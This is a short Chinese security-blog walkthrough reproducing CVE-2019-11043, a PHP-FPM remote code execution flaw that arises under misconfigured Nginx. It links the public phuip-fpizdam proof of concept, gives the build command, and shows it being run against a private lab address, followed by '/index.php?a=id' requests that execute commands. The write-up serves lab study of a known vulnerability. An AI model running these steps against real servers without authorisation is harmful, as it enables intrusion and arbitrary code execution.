CVE-2019-11043远程代码执行漏洞复现

2019-10-25 8,862

漏洞位置:

  • 提示

    任意PHP文件都可以,只要是使用go语言脚本攻击过的即可
    本例子中为index.php

漏洞详情:

  • 描述

    在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
  • 注意

    1.因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程。
    2.命令执行没办法传回有回显的信息,比如ifconfig等命令
  • 版本

    php-fpm + Nginx

请求方式:

GET

POC:

  • 下载poc包

    https://github.com/neex/phuip-fpizdam/archive/master.zip
  • 安装GO语言环境包

    https://studygolang.com/dl/golang/go1.13.3.windows-amd64.msi
  • 进入文件进行编译

    go build

1.png

  • 对网站发送payload

    phuip-fpizdam.exe "http://192.168.0.149:8080/index.php"

2.png

  • 复现效果

    3.png

    4.png


参考文章


本文作者:ascotbe

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/116446.html

Tags:
评论  (0)
快来写下你的想法吧!

ascotbe

文章数:12 积分: 190

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号